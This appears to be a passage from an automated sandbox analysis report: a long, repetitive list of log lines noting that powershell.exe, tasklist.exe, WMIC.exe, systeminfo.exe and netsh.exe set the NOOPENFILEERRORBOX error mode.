              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\systeminfo.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\netsh.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
